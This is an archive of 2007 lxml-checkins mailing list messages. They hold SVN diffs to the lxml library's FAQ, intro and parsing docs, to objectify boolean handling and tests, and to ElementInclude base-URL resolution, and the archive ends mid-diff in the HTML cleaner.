2.1 Why is lxml not written in Python? - 2.2 How can I contribute? - 3 Bugs - 3.1 My application crashes! - 3.2 I think I have found a bug in lxml. What should I do? - 4 Threading - 4.1 Can I use threads to concurrently access the lxml API? - 4.2 Does my program run faster if I use threads? - 4.3 Would my single-threaded program run faster if I turned off threading? - 5 Parsing and Serialisation - 5.1 Why doesn't the ``pretty_print`` option reformat my XML output? - 5.2 Why can't lxml parse my XML from unicode strings? - 5.3 What is the difference between str(xslt(doc)) and xslt(doc).write() ? - 5.4 Why can't I just delete parents or clear the root node in iterparse()? - 6 XPath and Document Traversal - 6.1 What are the ``findall()`` and ``xpath()`` methods on Element(Tree)? 
- 6.2 Why doesn't ``findall()`` support full XPath expressions? - 6.3 How can I find out which namespace prefixes are used in a document? - 6.4 How can I specify a default namespace for XPath expressions? + 1.4 What is the difference between lxml.etree and lxml.objectify? + 1.5 How can I make my application run faster? + 2 Installation + 2.1 Which version of libxml2 and libxslt should I use or require? + 2.2 Where are the Windows binaries? + 2.3 Why do I get errors about missing UCS4 symbols when installing lxml? + 3 Contributing + 3.1 Why is lxml not written in Python? + 3.2 How can I contribute? + 4 Bugs + 4.1 My application crashes! + 4.2 I think I have found a bug in lxml. What should I do? + 5 Threading + 5.1 Can I use threads to concurrently access the lxml API? + 5.2 Does my program run faster if I use threads? + 5.3 Would my single-threaded program run faster if I turned off threading? + 6 Parsing and Serialisation + 6.1 Why doesn't the ``pretty_print`` option reformat my XML output? + 6.2 Why can't lxml parse my XML from unicode strings? + 6.3 What is the difference between str(xslt(doc)) and xslt(doc).write() ? + 6.4 Why can't I just delete parents or clear the root node in iterparse()? + 7 XPath and Document Traversal + 7.1 What are the ``findall()`` and ``xpath()`` methods on Element(Tree)? + 7.2 Why doesn't ``findall()`` support full XPath expressions? + 7.3 How can I find out which namespace prefixes are used in a document? + 7.4 How can I specify a default namespace for XPath expressions? General Questions @@ -99,6 +100,51 @@ supports loading documents through HTTP and FTP. +What is the difference between lxml.etree and lxml.objectify? +------------------------------------------------------------- + +The two modules provide different ways of handling XML. However, objectify +builds on top of lxml.etree and therefore inherits most of its capabilities +and a large portion of its API. + +* lxml.etree is a generic API for XML and HTML handling. 
It aims for + ElementTree compatibility_ and supports the entire XML infoset. It is well + suited for both mixed content and data centric XML. Its generality makes it + the best choice for most applications. + +* lxml.objectify is a specialized API for XML data handling in a Python object + syntax. It provides a very natural way to deal with data fields stored in a + structurally well defined XML format. Data is automatically converted to + Python data types and can be manipulated with normal Python operators. Look + at the examples in the `objectify documentation`_ to see what it feels like + to use it. + + Objectify is not well suited for mixed contents or HTML documents. As it is + built on top of lxml.etree, however, it inherits the normal support for + XPath, XSLT or validation. + + +How can I make my application run faster? +----------------------------------------- + +lxml.etree is a very fast library for processing XML. There are, however, `a +few caveats`_ involved in the mapping of the powerful libxml2 library to the +simple and convenient ElementTree API. Not all operations are as fast as the +simplicity of the API might suggest, while some use cases can heavily benefit +from finding the right way of doing them. The `benchmark page`_ has a +comparison to other ElementTree implementations and a number of tips for +performance tweaking. As with any Python application, the rule of thumb is: +the more of your processing runs in C, the faster your application gets. See +also the section on threading_. + +.. _`a few caveats`: performance.html#the-elementtree-api +.. _`benchmark page`: performance.html +.. _threading: #threading + + +Installation +============ + Which version of libxml2 and libxslt should I use or require? ------------------------------------------------------------- @@ -153,48 +199,6 @@ http://cheeseshop.python.org/pypi/lxml/1.1.2 -What is the difference between lxml.etree and lxml.objectify? 
-------------------------------------------------------------- - -The two modules provide different ways of handling XML. However, objectify -builds on top of lxml.etree and therefore inherits most of its capabilities -and a large portion of its API. - -* lxml.etree is a generic API for XML and HTML handling. It aims for - ElementTree compatibility_ and supports the entire XML infoset. It is well - suited for both mixed content and data centric XML. Its generality makes it - the best choice for most applications. - -* lxml.objectify is a specialized API for XML data handling in a Python object - syntax. It provides a very natural way to deal with data fields stored in a - structurally well defined XML format. Data is automatically converted to - Python data types and can be manipulated with normal Python operators. Look - at the examples in the `objectify documentation`_ to see what it feels like - to use it. - - Objectify is not well suited for mixed contents or HTML documents. As it is - built on top of lxml.etree, however, it inherits the normal support for - XPath, XSLT or validation. - - -How can I make my application run faster? ------------------------------------------ - -lxml.etree is a very fast library for processing XML. There are, however, `a -few caveats`_ involved in the mapping of the powerful libxml2 library to the -simple and convenient ElementTree API. Not all operations are as fast as the -simplicity of the API might suggest, while some use cases can heavily benefit -from finding the right way of doing them. The `benchmark page`_ has a -comparison to other ElementTree implementations and a number of tips for -performance tweaking. As with any Python application, the rule of thumb is: -the more of your processing runs in C, the faster your application gets. See -also the section on threading_. - -.. _`a few caveats`: performance.html#the-elementtree-api -.. _`benchmark page`: performance.html -.. 
_threading: #threading - - Why do I get errors about missing UCS4 symbols when installing lxml? -------------------------------------------------------------------- From scoder at codespeak.net Tue Jun 19 14:21:26 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 14:21:26 +0200 (CEST) Subject: [Lxml-checkins] r44367 - lxml/trunk/doc Message-ID: <20070619122126.954AC80E5@code0.codespeak.net> Author: scoder Date: Tue Jun 19 14:21:23 2007 New Revision: 44367 Modified: lxml/trunk/doc/intro.txt Log: intro cleanup Modified: lxml/trunk/doc/intro.txt ============================================================================== --- lxml/trunk/doc/intro.txt (original) +++ lxml/trunk/doc/intro.txt Tue Jun 19 14:21:23 2007 @@ -14,21 +14,20 @@ To explain the motto: -"Programming with libxml2 is like the thrilling embrace of an exotic -stranger. It seems to have the potential to fulfill your wildest -dreams, but there's a nagging voice somewhere in your head warning you -that you're about to get screwed in the worst way." (`a quote by Mark -Pilgrim`_) - -Mark Pilgrim was describing in particular the experience a Python -programmer has when dealing with libxml2. libxml2's default Python -bindings are fast, thrilling, powerful, and your code might fail in -some horrible way that you really shouldn't have to worry about when -writing Python code. lxml tries to combine the power of libxml2 with -the ease of use of Python. +"Programming with libxml2 is like the thrilling embrace of an exotic stranger. +It seems to have the potential to fulfill your wildest dreams, but there's a +nagging voice somewhere in your head warning you that you're about to get +screwed in the worst way." (`a quote by Mark Pilgrim`_) + +Mark Pilgrim was describing in particular the experience a Python programmer +has when dealing with libxml2. 
The default Python bindings of libxml2 are +fast, thrilling, powerful, and your code might fail in some horrible way that +you really shouldn't have to worry about when writing Python code. lxml +combines the power of libxml2 with the ease of use of Python. .. _`a quote by Mark Pilgrim`: http://diveintomark.org/archives/2004/02/18/libxml2 + Aims ---- @@ -36,6 +35,8 @@ * Standards-compliant XML support. +* Support for (broken) HTML. + * Full-featured. * Actively maintained by XML experts. @@ -46,8 +47,9 @@ .. _libxslt: http://xmlsoft.org/XSLT -These libraries already ship with Python bindings, but these Python -bindings have problems. In particular: + +These libraries already ship with Python bindings, but these Python bindings +mimic the C-level interface. This yields a number of problems: * very low level and C-ish (not Pythonic). @@ -55,12 +57,13 @@ * UTF-8 in API, instead of Python unicode strings. -* can cause segfaults from Python. +* Can easily cause segfaults from Python. + +* Require manual memory management! -* have to do manual memory management! -lxml is a new Python binding for libxml2 and libxslt, completely -independent from these existing Python bindings. Its aim: +lxml is a new Python binding for libxml2 and libxslt, completely independent +from these existing Python bindings. Its aims: * Pythonic API. @@ -72,9 +75,8 @@ * No manual memory management! -lxml aims to provide a Pythonic API by following as much as possible -the `ElementTree API`_. We're trying to avoid having to invent too -many new APIs, or you having to learn new things -- XML is complicated -enough. +lxml aims to provide a Pythonic API by following as much as possible the +`ElementTree API`_. We're trying to avoid inventing too many new APIs, or you +having to learn new things -- XML is complicated enough. .. 
_`ElementTree API`: http://effbot.org/zone/element-index.htm From scoder at codespeak.net Tue Jun 19 14:23:15 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 14:23:15 +0200 (CEST) Subject: [Lxml-checkins] r44368 - lxml/trunk/doc Message-ID: <20070619122315.EB4BA80E5@code0.codespeak.net> Author: scoder Date: Tue Jun 19 14:23:10 2007 New Revision: 44368 Modified: lxml/trunk/doc/FAQ.txt Log: small FAQ cleanup Modified: lxml/trunk/doc/FAQ.txt ============================================================================== --- lxml/trunk/doc/FAQ.txt (original) +++ lxml/trunk/doc/FAQ.txt Tue Jun 19 14:23:10 2007 @@ -6,8 +6,8 @@ :description: Frequently Asked Questions about lxml (FAQ) :keywords: lxml, lxml.etree, FAQ, frequently asked questions - -See also the notes on compatibility_ to ElementTree_. +Frequently asked questions on lxml. See also the notes on compatibility_ to +ElementTree_. .. _compatibility: compatibility.html .. _ElementTree: http://effbot.org/zone/element-index.htm From scoder at codespeak.net Tue Jun 19 14:23:58 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 14:23:58 +0200 (CEST) Subject: [Lxml-checkins] r44369 - lxml/trunk/doc Message-ID: <20070619122358.E726980E5@code0.codespeak.net> Author: scoder Date: Tue Jun 19 14:23:58 2007 New Revision: 44369 Modified: lxml/trunk/doc/parsing.txt Log: doc: missing parser opts, make clear lxml parses both XML and HTML Modified: lxml/trunk/doc/parsing.txt ============================================================================== --- lxml/trunk/doc/parsing.txt (original) +++ lxml/trunk/doc/parsing.txt Tue Jun 19 14:23:58 2007 @@ -1,9 +1,10 @@ -===================== -Parsing XML with lxml -===================== - -lxml provides a very simple and powerful API for parsing XML. It supports -one-step parsing as well as step-by-step parsing using an event-driven API. 
+============================== +Parsing XML and HTML with lxml +============================== + +lxml provides a very simple and powerful API for parsing XML and HTML. It +supports one-step parsing as well as step-by-step parsing using an +event-driven API (currently only for XML). .. contents:: .. @@ -64,6 +65,10 @@ * remove_blank_text - discard blank text nodes between tags +* remove_comments - discard comments + +* compact - use compact storage for short text content (on by default) + Parsing HTML ------------ From scoder at codespeak.net Tue Jun 19 14:24:36 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 14:24:36 +0200 (CEST) Subject: [Lxml-checkins] r44370 - lxml/branch/lxml-1.3/doc Message-ID: <20070619122436.8FEBE80E5@code0.codespeak.net> Author: scoder Date: Tue Jun 19 14:24:31 2007 New Revision: 44370 Modified: lxml/branch/lxml-1.3/doc/FAQ.txt lxml/branch/lxml-1.3/doc/intro.txt lxml/branch/lxml-1.3/doc/parsing.txt Log: doc merge from trunk Modified: lxml/branch/lxml-1.3/doc/FAQ.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/FAQ.txt (original) +++ lxml/branch/lxml-1.3/doc/FAQ.txt Tue Jun 19 14:24:31 2007 @@ -7,8 +7,8 @@ :keywords: lxml, lxml.etree, FAQ, frequently asked questions :authors: Stefan Behnel, and various people on the mailing list - -See also the notes on compatibility_ to ElementTree_. +Frequently asked questions on lxml. See also the notes on compatibility_ to +ElementTree_. .. _compatibility: compatibility.html .. _ElementTree: http://effbot.org/zone/element-index.htm Modified: lxml/branch/lxml-1.3/doc/intro.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/intro.txt (original) +++ lxml/branch/lxml-1.3/doc/intro.txt Tue Jun 19 14:24:31 2007 @@ -14,21 +14,20 @@ To explain the motto: -"Programming with libxml2 is like the thrilling embrace of an exotic -stranger. 
It seems to have the potential to fulfill your wildest -dreams, but there's a nagging voice somewhere in your head warning you -that you're about to get screwed in the worst way." (`a quote by Mark -Pilgrim`_) - -Mark Pilgrim was describing in particular the experience a Python -programmer has when dealing with libxml2. libxml2's default Python -bindings are fast, thrilling, powerful, and your code might fail in -some horrible way that you really shouldn't have to worry about when -writing Python code. lxml tries to combine the power of libxml2 with -the ease of use of Python. +"Programming with libxml2 is like the thrilling embrace of an exotic stranger. +It seems to have the potential to fulfill your wildest dreams, but there's a +nagging voice somewhere in your head warning you that you're about to get +screwed in the worst way." (`a quote by Mark Pilgrim`_) + +Mark Pilgrim was describing in particular the experience a Python programmer +has when dealing with libxml2. The default Python bindings of libxml2 are +fast, thrilling, powerful, and your code might fail in some horrible way that +you really shouldn't have to worry about when writing Python code. lxml +combines the power of libxml2 with the ease of use of Python. .. _`a quote by Mark Pilgrim`: http://diveintomark.org/archives/2004/02/18/libxml2 + Aims ---- @@ -36,6 +35,8 @@ * Standards-compliant XML support. +* Support for (broken) HTML. + * Full-featured. * Actively maintained by XML experts. @@ -46,8 +47,9 @@ .. _libxslt: http://xmlsoft.org/XSLT -These libraries already ship with Python bindings, but these Python -bindings have problems. In particular: + +These libraries already ship with Python bindings, but these Python bindings +mimic the C-level interface. This yields a number of problems: * very low level and C-ish (not Pythonic). @@ -55,12 +57,13 @@ * UTF-8 in API, instead of Python unicode strings. -* can cause segfaults from Python. +* Can easily cause segfaults from Python. 
+ +* Require manual memory management! -* have to do manual memory management! -lxml is a new Python binding for libxml2 and libxslt, completely -independent from these existing Python bindings. Its aim: +lxml is a new Python binding for libxml2 and libxslt, completely independent +from these existing Python bindings. Its aims: * Pythonic API. @@ -72,9 +75,8 @@ * No manual memory management! -lxml aims to provide a Pythonic API by following as much as possible -the `ElementTree API`_. We're trying to avoid having to invent too -many new APIs, or you having to learn new things -- XML is complicated -enough. +lxml aims to provide a Pythonic API by following as much as possible the +`ElementTree API`_. We're trying to avoid inventing too many new APIs, or you +having to learn new things -- XML is complicated enough. .. _`ElementTree API`: http://effbot.org/zone/element-index.htm Modified: lxml/branch/lxml-1.3/doc/parsing.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/parsing.txt (original) +++ lxml/branch/lxml-1.3/doc/parsing.txt Tue Jun 19 14:24:31 2007 @@ -1,9 +1,10 @@ -===================== -Parsing XML with lxml -===================== - -lxml provides a very simple and powerful API for parsing XML. It supports -one-step parsing as well as step-by-step parsing using an event-driven API. +============================== +Parsing XML and HTML with lxml +============================== + +lxml provides a very simple and powerful API for parsing XML and HTML. It +supports one-step parsing as well as step-by-step parsing using an +event-driven API (currently only for XML). .. contents:: .. 
@@ -64,6 +65,10 @@ * remove_blank_text - discard blank text nodes between tags +* remove_comments - discard comments + +* compact - use compact storage for short text content (on by default) + Parsing HTML ------------ From scoder at codespeak.net Tue Jun 19 17:22:31 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 17:22:31 +0200 (CEST) Subject: [Lxml-checkins] r44377 - lxml/trunk/src/lxml Message-ID: <20070619152231.7765180E5@code0.codespeak.net> Author: scoder Date: Tue Jun 19 17:22:30 2007 New Revision: 44377 Modified: lxml/trunk/src/lxml/objectify.pyx Log: objectify: support '0' and '1' as boolean values Modified: lxml/trunk/src/lxml/objectify.pyx ============================================================================== --- lxml/trunk/src/lxml/objectify.pyx (original) +++ lxml/trunk/src/lxml/objectify.pyx Tue Jun 19 17:22:30 2007 @@ -759,7 +759,7 @@ return self.__nonzero__() def __checkBool(s): - if s != 'true' and s != 'false': + if s != 'true' and s != 'false' and s != '1' and s != '0': raise ValueError cdef object _strValueOf(obj): From scoder at codespeak.net Tue Jun 19 18:00:06 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 18:00:06 +0200 (CEST) Subject: [Lxml-checkins] r44381 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070619160006.F2BEC80EA@code0.codespeak.net> Author: scoder Date: Tue Jun 19 18:00:06 2007 New Revision: 44381 Modified: lxml/branch/lxml-1.3/src/lxml/objectify.pyx Log: objectify: support '0' and '1' as boolean values Modified: lxml/branch/lxml-1.3/src/lxml/objectify.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/objectify.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/objectify.pyx Tue Jun 19 18:00:06 2007 @@ -759,7 +759,7 @@ return self.__nonzero__() def __checkBool(s): - if s != 'true' and s != 'false': + if s != 'true' and s != 'false' and s != '1' and s != '0': raise ValueError cdef 
object _strValueOf(obj): From scoder at codespeak.net Tue Jun 19 21:39:55 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 21:39:55 +0200 (CEST) Subject: [Lxml-checkins] r44387 - lxml/branch/lxml-1.3/src/lxml/tests Message-ID: <20070619193955.8949680ED@code0.codespeak.net> Author: scoder Date: Tue Jun 19 21:39:54 2007 New Revision: 44387 Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py Log: objectify xsi type testcases by Holger Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py Tue Jun 19 21:39:54 2007 @@ -22,6 +22,24 @@ "xsi" : XML_SCHEMA_INSTANCE_NS, "xsd" : XML_SCHEMA_NS} +objectclass2xsitype = { + # objectify built-in + objectify.IntElement: ("int", "short", "byte", "unsignedShort", + "unsignedByte",), + objectify.LongElement: ("integer", "nonPositiveInteger", "negativeInteger", + "long", "nonNegativeInteger", "unsignedLong", + "unsignedInt", "positiveInteger",), + objectify.FloatElement: ("float", "double"), + objectify.BoolElement: ("boolean",), + objectify.StringElement: ("string", "normalizedString", "token", "language", + "Name", "NCName", "ID", "IDREF", "ENTITY", + "NMTOKEN", ), + # None: xsi:nil="true" + } + +xsitype2objclass = dict(( (v, k) for k in objectclass2xsitype + for v in objectclass2xsitype[k] )) + xml_str = '''\ @@ -476,6 +494,24 @@ self.assert_(isinstance(value, objectify.FloatElement)) self.assertEquals(value, 5.5) + def test_data_element_xsitypes(self): + for xsi, objclass in xsitype2objclass.iteritems(): + # 1 is a valid value for all ObjectifiedDataElement classes + value = objectify.DataElement(1, _xsi=xsi) + self.assert_(isinstance(value, objclass)) + + def test_data_element_xsitypes_xsdprefixed(self): + for xsi, objclass in xsitype2objclass.iteritems(): + # 1 is a valid 
value for all ObjectifiedDataElement classes + value = objectify.DataElement(1, _xsi="xsd:%s" % xsi) + self.assert_(isinstance(value, objclass)) + + def test_data_element_xsitypes_prefixed(self): + for xsi, objclass in xsitype2objclass.iteritems(): + # 1 is a valid value for all ObjectifiedDataElement classes + self.assertRaises(ValueError, objectify.DataElement, 1, + _xsi="foo:%s" % xsi) + def test_schema_types(self): XML = self.XML root = XML('''\ From scoder at codespeak.net Wed Jun 20 23:50:24 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 20 Jun 2007 23:50:24 +0200 (CEST) Subject: [Lxml-checkins] r44400 - lxml/trunk Message-ID: <20070620215024.9CF69811D@code0.codespeak.net> Author: scoder Date: Wed Jun 20 23:50:23 2007 New Revision: 44400 Modified: lxml/trunk/versioninfo.py Log: support unnormal SVN entries files Modified: lxml/trunk/versioninfo.py ============================================================================== --- lxml/trunk/versioninfo.py (original) +++ lxml/trunk/versioninfo.py Wed Jun 20 23:50:23 2007 @@ -34,7 +34,10 @@ data = map(str.splitlines, data.split('\n\x0c\n')) del data[0][0] # get rid of the '8' dirurl = data[0][3] - localrev = max([int(d[9]) for d in data if len(d)>9 and d[9]]) + try: + localrev = max([int(d[9]) for d in data if len(d)>9 and d[9]]) + except ValueError: + pass # may be some newly added directory elif data.startswith(' Author: scoder Date: Thu Jun 21 00:14:15 2007 New Revision: 44402 Added: lxml/trunk/src/lxml/tests/include/ lxml/trunk/src/lxml/tests/include/test_xinclude.xml - copied, changed from r44377, lxml/trunk/src/lxml/tests/test_xinclude.xml Removed: lxml/trunk/src/lxml/tests/test_xinclude.xml Modified: lxml/trunk/CHANGES.txt lxml/trunk/src/lxml/ElementInclude.py lxml/trunk/src/lxml/tests/test_etree.py Log: ElementInclude didn't honour base URL of source document Modified: lxml/trunk/CHANGES.txt ============================================================================== --- 
lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Thu Jun 21 00:14:15 2007 @@ -52,6 +52,8 @@ Bugs fixed ---------- +* ``ElementInclude`` didn't honour base URL of original document + * Replacing the children slice of an Element would cut off the tails of the original children Modified: lxml/trunk/src/lxml/ElementInclude.py ============================================================================== --- lxml/trunk/src/lxml/ElementInclude.py (original) +++ lxml/trunk/src/lxml/ElementInclude.py Thu Jun 21 00:14:15 2007 @@ -46,6 +46,7 @@ ## import copy, etree +from urlparse import urljoin try: set @@ -123,13 +124,15 @@ def include(elem, loader=None): if hasattr(elem, 'getroot'): - #if hasattr(elem, 'docinfo'): - # base_url = elem.docinfo.URL - _include(elem.getroot(), loader) + tree = elem + elem = elem.getroot() else: - _include(elem, loader) + tree = elem.getroottree() + if hasattr(tree, 'docinfo'): + base_url = tree.docinfo.URL + _include(elem, loader, base_url=base_url) -def _include(elem, loader=None, _parent_hrefs=None): +def _include(elem, loader=None, _parent_hrefs=None, base_url=None): if loader is not None: load_include = _wrap_et_loader(loader) else: @@ -146,7 +149,7 @@ for e in include_elements: if e.tag == XINCLUDE_INCLUDE: # process xinclude directive - href = e.get("href") + href = urljoin(base_url, e.get("href")) parse = e.get("parse", "xml") parent = e.getparent() if parse == "xml": Copied: lxml/trunk/src/lxml/tests/include/test_xinclude.xml (from r44377, lxml/trunk/src/lxml/tests/test_xinclude.xml) ============================================================================== --- lxml/trunk/src/lxml/tests/test_xinclude.xml (original) +++ lxml/trunk/src/lxml/tests/include/test_xinclude.xml Thu Jun 21 00:14:15 2007 @@ -1,4 +1,4 @@ - + \ No newline at end of file Modified: lxml/trunk/src/lxml/tests/test_etree.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_etree.py 
(original) +++ lxml/trunk/src/lxml/tests/test_etree.py Thu Jun 21 00:14:15 2007 @@ -1634,12 +1634,8 @@ self.assertEquals(old_text + content + old_tail, root.text) -class ETreeXIncludeTestCase(XIncludeTestCase): - def include(self, tree): - tree.xinclude() - def test_xinclude(self): - tree = etree.parse(fileInTestDir('test_xinclude.xml')) + tree = etree.parse(fileInTestDir('include/test_xinclude.xml')) # process xincludes self.include( tree ) # check whether we find it replaced with included data @@ -1647,6 +1643,10 @@ 'a', tree.getroot()[1].tag) +class ETreeXIncludeTestCase(XIncludeTestCase): + def include(self, tree): + tree.xinclude() + class ElementIncludeTestCase(XIncludeTestCase): from lxml import ElementInclude Deleted: /lxml/trunk/src/lxml/tests/test_xinclude.xml ============================================================================== --- /lxml/trunk/src/lxml/tests/test_xinclude.xml Thu Jun 21 00:14:15 2007 +++ (empty file) @@ -1,4 +0,0 @@ - - - - \ No newline at end of file From scoder at codespeak.net Thu Jun 21 00:15:12 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 21 Jun 2007 00:15:12 +0200 (CEST) Subject: [Lxml-checkins] r44403 - in lxml/branch/lxml-1.3: . 
src/lxml src/lxml/tests src/lxml/tests/include Message-ID: <20070620221512.EBEF3811E@code0.codespeak.net> Author: scoder Date: Thu Jun 21 00:15:12 2007 New Revision: 44403 Added: lxml/branch/lxml-1.3/src/lxml/tests/include/ - copied from r44402, lxml/trunk/src/lxml/tests/include/ lxml/branch/lxml-1.3/src/lxml/tests/include/test_xinclude.xml - copied unchanged from r44402, lxml/trunk/src/lxml/tests/include/test_xinclude.xml Removed: lxml/branch/lxml-1.3/src/lxml/tests/test_xinclude.xml Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/src/lxml/ElementInclude.py lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Log: ElementInclude didn't honour base URL of source document Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Thu Jun 21 00:15:12 2007 @@ -27,6 +27,8 @@ Bugs fixed ---------- +* ``ElementInclude`` didn't honour base URL of original document + * Replacing the children slice of an Element would cut off the tails of the original children Modified: lxml/branch/lxml-1.3/src/lxml/ElementInclude.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/ElementInclude.py (original) +++ lxml/branch/lxml-1.3/src/lxml/ElementInclude.py Thu Jun 21 00:15:12 2007 @@ -46,6 +46,7 @@ ## import copy, etree +from urlparse import urljoin try: set @@ -123,13 +124,15 @@ def include(elem, loader=None): if hasattr(elem, 'getroot'): - #if hasattr(elem, 'docinfo'): - # base_url = elem.docinfo.URL - _include(elem.getroot(), loader) + tree = elem + elem = elem.getroot() else: - _include(elem, loader) + tree = elem.getroottree() + if hasattr(tree, 'docinfo'): + base_url = tree.docinfo.URL + _include(elem, loader, base_url=base_url) -def _include(elem, loader=None, _parent_hrefs=None): +def _include(elem, loader=None, _parent_hrefs=None, base_url=None): if loader 
is not None: load_include = _wrap_et_loader(loader) else: @@ -146,7 +149,7 @@ for e in include_elements: if e.tag == XINCLUDE_INCLUDE: # process xinclude directive - href = e.get("href") + href = urljoin(base_url, e.get("href")) parse = e.get("parse", "xml") parent = e.getparent() if parse == "xml": Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Thu Jun 21 00:15:12 2007 @@ -1598,12 +1598,8 @@ self.assertEquals(old_text + content + old_tail, root.text) -class ETreeXIncludeTestCase(XIncludeTestCase): - def include(self, tree): - tree.xinclude() - def test_xinclude(self): - tree = etree.parse(fileInTestDir('test_xinclude.xml')) + tree = etree.parse(fileInTestDir('include/test_xinclude.xml')) # process xincludes self.include( tree ) # check whether we find it replaced with included data @@ -1611,6 +1607,10 @@ 'a', tree.getroot()[1].tag) +class ETreeXIncludeTestCase(XIncludeTestCase): + def include(self, tree): + tree.xinclude() + class ElementIncludeTestCase(XIncludeTestCase): from lxml import ElementInclude Deleted: /lxml/branch/lxml-1.3/src/lxml/tests/test_xinclude.xml ============================================================================== --- /lxml/branch/lxml-1.3/src/lxml/tests/test_xinclude.xml Thu Jun 21 00:15:12 2007 +++ (empty file) @@ -1,4 +0,0 @@ - - - - \ No newline at end of file From scoder at codespeak.net Thu Jun 21 10:35:13 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 21 Jun 2007 10:35:13 +0200 (CEST) Subject: [Lxml-checkins] r44405 - lxml/trunk/src/lxml Message-ID: <20070621083513.8B6FD811D@code0.codespeak.net> Author: scoder Date: Thu Jun 21 10:35:13 2007 New Revision: 44405 Modified: lxml/trunk/src/lxml/ElementInclude.py Log: open any URL by default in ElementInclude, small optimisation Modified: 
lxml/trunk/src/lxml/ElementInclude.py ============================================================================== --- lxml/trunk/src/lxml/ElementInclude.py (original) +++ lxml/trunk/src/lxml/ElementInclude.py Thu Jun 21 10:35:13 2007 @@ -47,6 +47,7 @@ import copy, etree from urlparse import urljoin +from urllib2 import urlopen try: set @@ -96,7 +97,12 @@ if parse == "xml": data = etree.parse(href, parser).getroot() else: - data = open(href).read() + if "://" in href: + f = urlopen(href) + else: + f = open(href) + data = f.read() + f.close() if encoding: data = data.decode(encoding) return data @@ -122,14 +128,17 @@ # @throws IOError If the function fails to load a given resource. # @returns the node or its replacement if it was an XInclude node -def include(elem, loader=None): - if hasattr(elem, 'getroot'): - tree = elem +def include(elem, loader=None, base_url=None): + if base_url is None: + if hasattr(elem, 'getroot'): + tree = elem + elem = elem.getroot() + else: + tree = elem.getroottree() + if hasattr(tree, 'docinfo'): + base_url = tree.docinfo.URL + elif hasattr(elem, 'getroot'): elem = elem.getroot() - else: - tree = elem.getroottree() - if hasattr(tree, 'docinfo'): - base_url = tree.docinfo.URL _include(elem, loader, base_url=base_url) def _include(elem, loader=None, _parent_hrefs=None, base_url=None): From scoder at codespeak.net Thu Jun 21 12:29:21 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 21 Jun 2007 12:29:21 +0200 (CEST) Subject: [Lxml-checkins] r44407 - lxml/trunk/src/lxml/tests Message-ID: <20070621102921.7036A810E@code0.codespeak.net> Author: scoder Date: Thu Jun 21 12:29:20 2007 New Revision: 44407 Modified: lxml/trunk/src/lxml/tests/test_etree.py Log: small test fix Modified: lxml/trunk/src/lxml/tests/test_etree.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_etree.py (original) +++ lxml/trunk/src/lxml/tests/test_etree.py Thu Jun 21 12:29:20 2007 
@@ -1636,6 +1636,9 @@ def test_xinclude(self): tree = etree.parse(fileInTestDir('include/test_xinclude.xml')) + self.assertNotEquals( + 'a', + tree.getroot()[1].tag) # process xincludes self.include( tree ) # check whether we find it replaced with included data From scoder at codespeak.net Thu Jun 21 21:21:01 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 21 Jun 2007 21:21:01 +0200 (CEST) Subject: [Lxml-checkins] r44410 - lxml/branch/html/src/lxml/html Message-ID: <20070621192101.A610380D2@code0.codespeak.net> Author: scoder Date: Thu Jun 21 21:20:54 2007 New Revision: 44410 Modified: lxml/branch/html/src/lxml/html/clean.py Log: fix for stupid bug in set usage Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Thu Jun 21 21:20:54 2007 @@ -244,21 +244,21 @@ if meta: kill_tags.add('meta') if page_structure: - remove_tags.union(('head', 'html', 'title')) + remove_tags.update(('head', 'html', 'title')) if embedded: # FIXME: is really embedded? 
